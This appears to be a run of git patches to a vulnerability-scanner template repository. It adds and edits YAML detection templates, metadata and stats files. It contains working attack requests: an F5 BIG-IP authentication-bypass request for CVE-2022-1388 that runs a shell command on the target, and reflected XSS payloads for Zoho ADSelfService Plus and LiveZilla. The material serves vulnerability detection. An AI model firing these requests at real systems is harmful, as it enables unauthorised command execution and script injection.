From: GitHub Action Date: Mon, 9 May 2022 07:19:18 +0000 Subject: [PATCH 070/115] Auto Generated New Template Addition List [Mon May 9 07:19:18 UTC 2022] :robot: --- .new-additions | 42 ++---------------------------------------- 1 file changed, 2 insertions(+), 40 deletions(-) diff --git a/.new-additions b/.new-additions index 64d3988430..5ba25bc823 100644 --- a/.new-additions +++ b/.new-additions @@ -1,40 +1,2 @@ -cves/2018/CVE-2018-11231.yaml -cves/2021/CVE-2021-25111.yaml -cves/2021/CVE-2021-25118.yaml -cves/2021/CVE-2021-36356.yaml -cves/2021/CVE-2021-39312.yaml -cves/2022/CVE-2022-0165.yaml -cves/2022/CVE-2022-0201.yaml -cves/2022/CVE-2022-0288.yaml -cves/2022/CVE-2022-0422.yaml -cves/2022/CVE-2022-0540.yaml -cves/2022/CVE-2022-0543.yaml -cves/2022/CVE-2022-0591.yaml -cves/2022/CVE-2022-1439.yaml -cves/2022/CVE-2022-26233.yaml -cves/2022/CVE-2022-26352.yaml -cves/2022/CVE-2022-26564.yaml -default-logins/others/telecom-gateway-default-login.yaml -exposed-panels/bigip-rest-panel.yaml -exposed-panels/cyberoam-ssl-vpn-panel.yaml -exposed-panels/oracle-containers-panel.yaml -exposed-panels/oracle-enterprise-manager-login.yaml -exposed-panels/ruijie/rg-uac-panel.yaml -exposed-panels/supermicro-bmc-panel.yaml -exposed-panels/xoops/xoops-installation-wizard.yaml -exposed-panels/zoneminder-login.yaml -exposures/files/desktop-ini-exposure.yaml -file/audit/fortigate/auto-usb-install.yaml -file/audit/fortigate/heuristic-scan.yaml -file/audit/fortigate/inactivity-timeout.yaml -file/audit/fortigate/maintainer-account.yaml -file/audit/fortigate/password-policy.yaml -file/audit/fortigate/remote-auth-timeout.yaml -file/audit/fortigate/scp-admin.yaml -file/audit/fortigate/strong-ciphers.yaml -fuzzing/valid-gmail-check.yaml -misconfiguration/google/insecure-firebase-database.yaml -misconfiguration/unauthenticated-nginx-dashboard.yaml -technologies/sucuri-firewall.yaml -vulnerabilities/ruijie/ruijie-password-leak.yaml -vulnerabilities/wordpress/health-check-lfi.yaml +cves/2017/CVE-2017-11512.yaml +cves/2019/CVE-2019-12962.yaml From 05b11904d61467a232bc02f0c86d674d0b976051 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 13:06:31 +0530 Subject: [PATCH 071/115] Update panabit-default-login.yaml --- default-logins/panabit/panabit-default-login.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index 32e1bf79f9..00c307ff50 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -58,7 +58,6 @@ requests: part: header words: - "paonline_admin" - condition: and - type: status status: From f572c898c556bb549f1b97e194ee9e45c386cc44 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 9 May 2022 14:53:05 +0700 Subject: [PATCH 072/115] Add CVE-2022-1388 --- cves/2022/CVE-2022-1388.yaml | 40 ++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2022/CVE-2022-1388.yaml diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml new file mode 100644 index 0000000000..a1c49435b6 --- /dev/null +++ b/cves/2022/CVE-2022-1388.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-1388 + +info: + name: F5 BIG-IP iControl REST Auth Bypass RCE + author: dwisiswant0 + severity: critical + description: | + This vulnerability may allow an unauthenticated attacker + with network access to the BIG-IP system through the management + port and/or self IP addresses to execute arbitrary system commands, + create or delete files, or disable services. There is no data plane + exposure; this is a control plane issue only. + reference: + - https://support.f5.com/csp/article/K23605346 + tags: bigip,cve,cve2022,rce,mirai + +variables: + auth: "admin:" + +requests: + - raw: + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive, X-F5-Auth-Token + X-F5-Auth-Token: a + Authorization: Basic {{base64(auth)}} + Content-Type: application/json + + { + "command": "run", + "utilCmdArgs": "-c id" + } + + matchers: + - type: word + words: + - "commandResult" + - "uid=" + condition: and \ No newline at end of file From c44aed7f5e0b66ef45486888f0065fd3569f4bbd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 13:31:15 +0530 Subject: [PATCH 073/115] Update huijietong-cloud-fileread.yaml --- vulnerabilities/other/huijietong-cloud-fileread.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index 41d5664347..1ab77f4a97 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -21,12 +21,11 @@ requests: matchers-condition: and matchers: - - type: regex part: body regex: - "root:.*:0:0:" - - "for 16-bit app support" + - "\\[(font|extension|file)s\\]" condition: or - type: status From 955e67ca1f2b926c298640b85e22565ebb8d49a1 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 9 May 2022 15:15:36 +0700 Subject: [PATCH 075/115] misc: Remove unnecessary request header --- cves/2022/CVE-2022-1388.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index a1c49435b6..411b9ea90d 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -14,9 +14,6 @@ info: - https://support.f5.com/csp/article/K23605346 tags: bigip,cve,cve2022,rce,mirai -variables: - auth: "admin:" - requests: - raw: - | @@ -24,7 +21,6 @@ requests: Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a - Authorization: Basic {{base64(auth)}} Content-Type: application/json { From 2209df55769507ec71d6656e3576ace0c297c076 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 14:06:32 +0530 Subject: [PATCH 076/115] Update CVE-2022-1388.yaml --- cves/2022/CVE-2022-1388.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index 411b9ea90d..4681a63d22 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -12,8 +12,13 @@ info: exposure; this is a control plane issue only. reference: - https://support.f5.com/csp/article/K23605346 + metadata: + verified-by: rootup tags: bigip,cve,cve2022,rce,mirai +variables: + auth: "admin:" + requests: - raw: - | @@ -21,16 +26,16 @@ requests: Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a + Authorization: Basic {{base64(auth)}} Content-Type: application/json { "command": "run", "utilCmdArgs": "-c id" } - matchers: - type: word words: - "commandResult" - "uid=" - condition: and \ No newline at end of file + condition: and From 5b83312cb5ad0108478ea2e53978000daa6943b3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 14:10:31 +0530 Subject: [PATCH 077/115] Update CVE-2022-1388.yaml --- cves/2022/CVE-2022-1388.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index 4681a63d22..c1d7de6648 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -11,9 +11,10 @@ info: create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only. reference: + - https://twitter.com/GossiTheDog/status/1523566937414193153 - https://support.f5.com/csp/article/K23605346 metadata: - verified-by: rootup + verified-by: RandomDhiraj tags: bigip,cve,cve2022,rce,mirai variables: @@ -38,4 +39,4 @@ requests: words: - "commandResult" - "uid=" - condition: and + condition: and From ad164f4d3685e41c0a245daaeb17a49d7872cd15 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 08:58:50 +0000 Subject: [PATCH 078/115] Auto Generated New Template Addition List [Mon May 9 08:58:50 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5ba25bc823..f0b369cf0a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ cves/2017/CVE-2017-11512.yaml cves/2019/CVE-2019-12962.yaml +cves/2022/CVE-2022-1388.yaml From 940202d7724536c8474b58a17ba7fa81b07bd4d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 08:58:57 +0000 Subject: [PATCH 079/115] Auto Generated CVE annotations [Mon May 9 08:58:57 UTC 2022] :robot: --- cves/2022/CVE-2022-1388.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index c1d7de6648..1c0eb177b6 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -19,6 +19,11 @@ info: variables: auth: "admin:" + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-1388 + cwe-id: CWE-306 requests: - raw: From 38f07ddf9bb8bd5164763b2e6bef5c3a48846c7a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 09:03:38 +0000 Subject: [PATCH 080/115] Auto Generated New Template Addition List [Mon May 9 09:03:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f0b369cf0a..717f8aa0cc 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ cves/2017/CVE-2017-11512.yaml cves/2019/CVE-2019-12962.yaml cves/2022/CVE-2022-1388.yaml +default-logins/others/panabit-ixcache-default-login.yaml From 6a005b7cbcee6254eee07672f30b9b9c2df67a08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 May 2022 15:07:01 +0530 Subject: [PATCH 081/115] misc update --- cves/2022/CVE-2022-1388.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index 1c0eb177b6..b7e9ab91fd 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -13,17 +13,18 @@ info: reference: - https://twitter.com/GossiTheDog/status/1523566937414193153 - https://support.f5.com/csp/article/K23605346 - metadata: - verified-by: RandomDhiraj - tags: bigip,cve,cve2022,rce,mirai - -variables: - auth: "admin:" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-1388 cwe-id: CWE-306 + metadata: + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + verified: true + tags: bigip,cve,cve2022,rce,mirai + +variables: + auth: "admin:" requests: - raw: @@ -39,9 +40,10 @@ requests: "command": "run", "utilCmdArgs": "-c id" } + matchers: - type: word words: - "commandResult" - "uid=" - condition: and + condition: and \ No newline at end of file From 95f4bef801e1ba84e8407c06517ee9040111453a Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 9 May 2022 15:13:18 +0530 Subject: [PATCH 083/115] meta data update --- cves/2017/CVE-2017-11512.yaml | 2 +- cves/2019/CVE-2019-12962.yaml | 10 ++++++---- .../google/insecure-firebase-database.yaml | 2 +- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2017/CVE-2017-11512.yaml b/cves/2017/CVE-2017-11512.yaml index 62b48662da..279dc4e183 100644 --- a/cves/2017/CVE-2017-11512.yaml +++ b/cves/2017/CVE-2017-11512.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 metadata: - verified-by: princechaddha + verified: true shodan-query: http.title:"ManageEngine" tags: cve,cve2017,manageengine,lfr,unauth diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml index e5a733f55c..f7c95b542b 100644 --- a/cves/2019/CVE-2019-12962.yaml +++ b/cves/2019/CVE-2019-12962.yaml @@ -9,15 +9,16 @@ info: reference: - https://www.exploit-db.com/exploits/49669 - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - metadata: - verified-by: dhiyaneshdk - shodan-query: http.html:LiveZilla - tags: cve,cve2019,livezilla,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2019-12962 cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.html:LiveZilla + tags: cve,cve2019,livezilla,xss + requests: - method: GET @@ -26,6 +27,7 @@ requests: headers: Accept-Language: ';alert(document.domain)//' + matchers-condition: and matchers: - type: word diff --git a/misconfiguration/google/insecure-firebase-database.yaml b/misconfiguration/google/insecure-firebase-database.yaml index 04e0f83cee..bb269ae48f 100644 --- a/misconfiguration/google/insecure-firebase-database.yaml +++ b/misconfiguration/google/insecure-firebase-database.yaml @@ -8,7 +8,7 @@ info: reference: - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty metadata: - verified-by: dhiyaneshdk + verified: true tags: firebase,google,misconfig requests: From f0a431bcc8c3cdf81bae2e780712f644c05ff314 Mon Sep 17 00:00:00 2001 From: vrenzolaverace Date: Mon, 9 May 2022 11:51:53 +0200 Subject: [PATCH 085/115] Add CVE-2021-37416 (#4235) * Add CVE-2022-0208 * misc updates * Add CVE-2021-37416 * Added metadata + additional page specific matcher * additional metadata Co-authored-by: sandeep --- cves/2021/CVE-2021-37416.yaml | 43 +++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 cves/2021/CVE-2021-37416.yaml diff --git a/cves/2021/CVE-2021-37416.yaml b/cves/2021/CVE-2021-37416.yaml new file mode 100644 index 0000000000..d534bfabf9 --- /dev/null +++ b/cves/2021/CVE-2021-37416.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-37416 + +info: + name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + tags: cve,cve2021,zoho,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and \ No newline at end of file From c1d26538a47831f3873f3d2221cad367364f5617 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 09:52:14 +0000 Subject: [PATCH 086/115] Auto Generated New Template Addition List [Mon May 9 09:52:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 717f8aa0cc..877f0851e2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2017/CVE-2017-11512.yaml cves/2019/CVE-2019-12962.yaml +cves/2021/CVE-2021-37416.yaml cves/2022/CVE-2022-1388.yaml default-logins/others/panabit-ixcache-default-login.yaml From e62f03cbccd7ed5f6e104ebfa7f830f15859475d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 09:55:55 +0000 Subject: [PATCH 087/115] Auto Generated Templates Stats [Mon May 9 09:55:55 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 2992 +++++++++++++++++++++--------------------- TOP-10.md | 16 +- 3 files changed, 1505 insertions(+), 1505 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 86583adabe..59d252c4e4 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1146},{"name":"panel","count":513},{"name":"lfi","count":460},{"name":"xss","count":361},{"name":"wordpress","count":358},{"name":"exposure","count":292},{"name":"rce","count":288},{"name":"cve2021","count":282},{"name":"tech","count":265},{"name":"wp-plugin","count":259},{"name":"cve2020","count":196},{"name":"","count":188},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":120},{"name":"apache","count":120},{"name":"cve2019","count":117},{"name":"cve2010","count":111},{"name":"default-login","count":108},{"name":"unauth","count":102},{"name":"iot","count":102},{"name":"oast","count":96},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":68},{"name":"misconfig","count":65},{"name":"cve2017","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":60},{"name":"file","count":60},{"name":"cve2022","count":58},{"name":"network","count":53},{"name":"oracle","count":50},{"name":"wp","count":49},{"name":"router","count":49},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"auth-bypass","count":37},{"name":"cve2015","count":36},{"name":"google","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"injection","count":30},{"name":"jira","count":30},{"name":"listing","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":25},{"name":"kubernetes","count":25},{"name":"oss","count":24},{"name":"springboot","count":24},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"intrusive","count":21},{"name":"microsoft","count":21},{"name":"aem","count":21},{"name":"vmware","count":21},{"name":"misc","count":21},{"name":"debug","count":21},{"name":"fuzz","count":20},{"name":"service","count":20},{"name":"wp-theme","count":19},{"name":"cve2012","count":19},{"name":"dns","count":18},{"name":"manageengine","count":18},{"name":"php","count":18},{"name":"deserialization","count":17},{"name":"zoho","count":17},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"jenkins","count":15},{"name":"dlink","count":15},{"name":"struts","count":15},{"name":"gitlab","count":15},{"name":"java","count":14},{"name":"xxe","count":14},{"name":"cve2009","count":14},{"name":"hp","count":14},{"name":"api","count":14},{"name":"fileupload","count":14},{"name":"android","count":14},{"name":"ruijie","count":13},{"name":"camera","count":13},{"name":"netsweeper","count":12},{"name":"rails","count":12},{"name":"status","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"printer","count":12},{"name":"cnvd2021","count":11},{"name":"graphql","count":11},{"name":"firewall","count":11},{"name":"netgear","count":11},{"name":"nginx","count":11},{"name":"lfr","count":11},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"airflow","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"coldfusion","count":10},{"name":"backup","count":10},{"name":"fortigate","count":10},{"name":"spring","count":10},{"name":"auth","count":10},{"name":"jolokia","count":10},{"name":"dell","count":10},{"name":"jndi","count":9},{"name":"fortinet","count":9},{"name":"ftp","count":9},{"name":"windows","count":9},{"name":"woocommerce","count":9},{"name":"cve2008","count":9},{"name":"drupal","count":9},{"name":"github","count":9},{"name":"webserver","count":9},{"name":"laravel","count":9},{"name":"zabbix","count":9},{"name":"fastjson","count":9},{"name":"scada","count":8},{"name":"azure","count":8},{"name":"vcenter","count":8},{"name":"prometheus","count":8},{"name":"bypass","count":8},{"name":"amazon","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"iis","count":8},{"name":"wso2","count":8},{"name":"citrix","count":8},{"name":"phpmyadmin","count":8},{"name":"metadata","count":8},{"name":"blind","count":8},{"name":"mirai","count":8},{"name":"audit","count":8},{"name":"django","count":8},{"name":"rconfig","count":7},{"name":"kafka","count":7},{"name":"ssti","count":7},{"name":"firebase","count":7},{"name":"elasticsearch","count":7},{"name":"files","count":7},{"name":"maps","count":7},{"name":"mail","count":7},{"name":"vpn","count":7},{"name":"sonicwall","count":7},{"name":"bucket","count":7},{"name":"exchange","count":7},{"name":"python","count":7},{"name":"squirrelmail","count":7},{"name":"kube","count":7},{"name":"jetty","count":6},{"name":"cicd","count":6},{"name":"cnvd2020","count":6},{"name":"nodejs","count":6},{"name":"lucee","count":6},{"name":"cobbler","count":6},{"name":"backdoor","count":6},{"name":"druid","count":6},{"name":"sitecore","count":6},{"name":"enum","count":6},{"name":"jboss","count":6},{"name":"zimbra","count":6},{"name":"slack","count":6},{"name":"crlf","count":6},{"name":"firmware","count":6},{"name":"docker","count":6},{"name":"ofbiz","count":6},{"name":"fpd","count":6},{"name":"huawei","count":6},{"name":"go","count":6},{"name":"headless","count":6},{"name":"magmi","count":6},{"name":"error","count":5},{"name":"bigip","count":5},{"name":"minio","count":5},{"name":"keycloak","count":5},{"name":"rfi","count":5},{"name":"circarlife","count":5},{"name":"leak","count":5},{"name":"zhiyuan","count":5},{"name":"moodle","count":5},{"name":"ecology","count":5},{"name":"ruby","count":5},{"name":"icewarp","count":5},{"name":"rseenet","count":5},{"name":"apisix","count":5},{"name":"opensis","count":5},{"name":"node","count":5},{"name":"alibaba","count":5},{"name":"thinkphp","count":5},{"name":"strapi","count":5},{"name":"solarwinds","count":5},{"name":"setup","count":5},{"name":"fatpipe","count":5},{"name":"samsung","count":5},{"name":"metinfo","count":5},{"name":"gocd","count":5},{"name":"kubelet","count":5},{"name":"git","count":5},{"name":"storage","count":5},{"name":"artica","count":5},{"name":"microweber","count":5},{"name":"cache","count":5},{"name":"symantec","count":5},{"name":"symfony","count":5},{"name":"ssl","count":5},{"name":"dedecms","count":5},{"name":"ognl","count":4},{"name":"awstats","count":4},{"name":"cacti","count":4},{"name":"plesk","count":4},{"name":"jellyfin","count":4},{"name":"springcloud","count":4},{"name":"hikvision","count":4},{"name":"aspose","count":4},{"name":"oa","count":4},{"name":"cockpit","count":4},{"name":"caucho","count":4},{"name":"paypal","count":4},{"name":"terramaster","count":4},{"name":"resin","count":4},{"name":"hpe","count":4},{"name":"wcs","count":4},{"name":"flink","count":4},{"name":"activemq","count":4},{"name":"sonarqube","count":4},{"name":"panos","count":4},{"name":"mongodb","count":4},{"name":"buffalo","count":4},{"name":"couchdb","count":4},{"name":"search","count":4},{"name":"websphere","count":4},{"name":"jetbrains","count":4},{"name":"db","count":4},{"name":"kevinlab","count":4},{"name":"nexus","count":4},{"name":"xmlrpc","count":4},{"name":"beyondtrust","count":4},{"name":"puppet","count":4},{"name":"smtp","count":4},{"name":"tikiwiki","count":4},{"name":"microstrategy","count":4},{"name":"cve2007","count":4},{"name":"voip","count":4},{"name":"ssh","count":4},{"name":"hoteldruid","count":4},{"name":"stripe","count":4},{"name":"thinkcmf","count":4},{"name":"adminer","count":4},{"name":"asp","count":4},{"name":"elastic","count":4},{"name":"artifactory","count":4},{"name":"photo","count":4},{"name":"prestashop","count":4},{"name":"gogs","count":4},{"name":"cnvd2019","count":4},{"name":"kibana","count":4},{"name":"hongdian","count":4},{"name":"npm","count":4},{"name":"zyxel","count":4},{"name":"cloud","count":4},{"name":"mailchimp","count":4},{"name":"movable","count":3},{"name":"actuator","count":3},{"name":"postmessage","count":3},{"name":"phppgadmin","count":3},{"name":"javascript","count":3},{"name":"ampps","count":3},{"name":"webadmin","count":3},{"name":"fanruan","count":3},{"name":"openemr","count":3},{"name":"splunk","count":3},{"name":"pentaho","count":3},{"name":"linkedin","count":3},{"name":"openssh","count":3},{"name":"wordfence","count":3},{"name":"httpbin","count":3},{"name":"jfrog","count":3},{"name":"linksys","count":3},{"name":"odoo","count":3},{"name":"heroku","count":3},{"name":"nacos","count":3},{"name":"fuelcms","count":3},{"name":"sql","count":3},{"name":"cisa","count":3},{"name":"netlify","count":3},{"name":"lotus","count":3},{"name":"telerik","count":3},{"name":"phpinfo","count":3},{"name":"ems","count":3},{"name":"mcafee","count":3},{"name":"seeyon","count":3},{"name":"square","count":3},{"name":"axis2","count":3},{"name":"kentico","count":3},{"name":"sophos","count":3},{"name":"concrete","count":3},{"name":"messaging","count":3},{"name":"dolibarr","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"dreambox","count":3},{"name":"fortios","count":3},{"name":"horizon","count":3},{"name":"globalprotect","count":3},{"name":"jeesns","count":3},{"name":"consul","count":3},{"name":"trendnet","count":3},{"name":"graph","count":3},{"name":"log","count":3},{"name":"openbmcs","count":3},{"name":"samba","count":3},{"name":"targa","count":3},{"name":"sendgrid","count":3},{"name":"jamf","count":3},{"name":"dos","count":3},{"name":"workspaceone","count":3},{"name":"geowebserver","count":3},{"name":"redis","count":3},{"name":"grav","count":3},{"name":"zeroshell","count":3},{"name":"synology","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"elfinder","count":3},{"name":"seagate","count":3},{"name":"kingsoft","count":3},{"name":"mongo","count":3},{"name":"voipmonitor","count":3},{"name":"axis","count":3},{"name":"bruteforce","count":3},{"name":"exposures","count":3},{"name":"rlm","count":3},{"name":"prtg","count":3},{"name":"hashicorp","count":3},{"name":"empirecms","count":3},{"name":"vrealize","count":3},{"name":"bitrix","count":3},{"name":"thinfinity","count":3},{"name":"centos","count":3},{"name":"oauth","count":3},{"name":"facebook","count":3},{"name":"smb","count":3},{"name":"lansweeper","count":3},{"name":"selea","count":3},{"name":"subrion","count":3},{"name":"sugarcrm","count":3},{"name":"nosqli","count":3},{"name":"trixbox","count":3},{"name":"database","count":3},{"name":"glassfish","count":3},{"name":"httpd","count":3},{"name":"axigen","count":3},{"name":"linkerd","count":3},{"name":"sharepoint","count":3},{"name":"nuuo","count":3},{"name":"3cx","count":3},{"name":"epson","count":3},{"name":"circleci","count":3},{"name":"sentry","count":2},{"name":"backups","count":2},{"name":"motorola","count":2},{"name":"pbootcms","count":2},{"name":"dotcms","count":2},{"name":"gitlist","count":2},{"name":"metabase","count":2},{"name":"filemanager","count":2},{"name":"ansible","count":2},{"name":"chamilo","count":2},{"name":"cas","count":2},{"name":"maian","count":2},{"name":"ranger","count":2},{"name":"showdoc","count":2},{"name":"panabit","count":2},{"name":"phpstorm","count":2},{"name":"seacms","count":2},{"name":"openstack","count":2},{"name":"vidyo","count":2},{"name":"pacsone","count":2},{"name":"rackn","count":2},{"name":"owasp","count":2},{"name":"zte","count":2},{"name":"konga","count":2},{"name":"cve2005","count":2},{"name":"weather","count":2},{"name":"cloudflare","count":2},{"name":"auerswald","count":2},{"name":"lantronix","count":2},{"name":"nextcloud","count":2},{"name":"javamelody","count":2},{"name":"conductor","count":2},{"name":"flightpath","count":2},{"name":"places","count":2},{"name":"thruk","count":2},{"name":"password","count":2},{"name":"yapi","count":2},{"name":"glances","count":2},{"name":"swagger","count":2},{"name":"matrix","count":2},{"name":"emerge","count":2},{"name":"typo3","count":2},{"name":"cve2006","count":2},{"name":"itop","count":2},{"name":"couchbase","count":2},{"name":"zerof","count":2},{"name":"mida","count":2},{"name":"ametys","count":2},{"name":"dubbo","count":2},{"name":"bomgar","count":2},{"name":"sangfor","count":2},{"name":"rockmongo","count":2},{"name":"twitter","count":2},{"name":"influxdb","count":2},{"name":"ecoa","count":2},{"name":"openwrt","count":2},{"name":"virtualui","count":2},{"name":"hostheader-injection","count":2},{"name":"ad","count":2},{"name":"rancher","count":2},{"name":"proftpd","count":2},{"name":"traefik","count":2},{"name":"netsus","count":2},{"name":"rabbitmq","count":2},{"name":"neos","count":2},{"name":"fortimail","count":2},{"name":"avtech","count":2},{"name":"tidb","count":2},{"name":"text","count":2},{"name":"intellian","count":2},{"name":"justwriting","count":2},{"name":"supermicro","count":2},{"name":"wamp","count":2},{"name":"nextjs","count":2},{"name":"clusterengine","count":2},{"name":"appcms","count":2},{"name":"ovirt","count":2},{"name":"ambari","count":2},{"name":"avantfax","count":2},{"name":"emqx","count":2},{"name":"netscaler","count":2},{"name":"yii","count":2},{"name":"dynamicweb","count":2},{"name":"payara","count":2},{"name":"ilo","count":2},{"name":"alienvault","count":2},{"name":"csrf","count":2},{"name":"sqlite","count":2},{"name":"apollo","count":2},{"name":"myfactory","count":2},{"name":"jsf","count":2},{"name":"igs","count":2},{"name":"exacqvision","count":2},{"name":"pascom","count":2},{"name":"pega","count":2},{"name":"bigant","count":2},{"name":"sidekiq","count":2},{"name":"zzzcms","count":2},{"name":"rstudio","count":2},{"name":"docs","count":2},{"name":"linux","count":2},{"name":"kong","count":2},{"name":"bigbluebutton","count":2},{"name":"labkey","count":2},{"name":"zblogphp","count":2},{"name":"webmin","count":2},{"name":"redash","count":2},{"name":"aviatrix","count":2},{"name":"jeedom","count":2},{"name":"gitbook","count":2},{"name":"avaya","count":2},{"name":"dotnetnuke","count":2},{"name":"frontpage","count":2},{"name":"code42","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"versa","count":2},{"name":"xerox","count":2},{"name":"wuzhicms","count":2},{"name":"mailgun","count":2},{"name":"terraform","count":2},{"name":"ivanti","count":2},{"name":"acrolinx","count":2},{"name":"natshell","count":2},{"name":"arcgis","count":2},{"name":"listserv","count":2},{"name":"orchid","count":2},{"name":"alf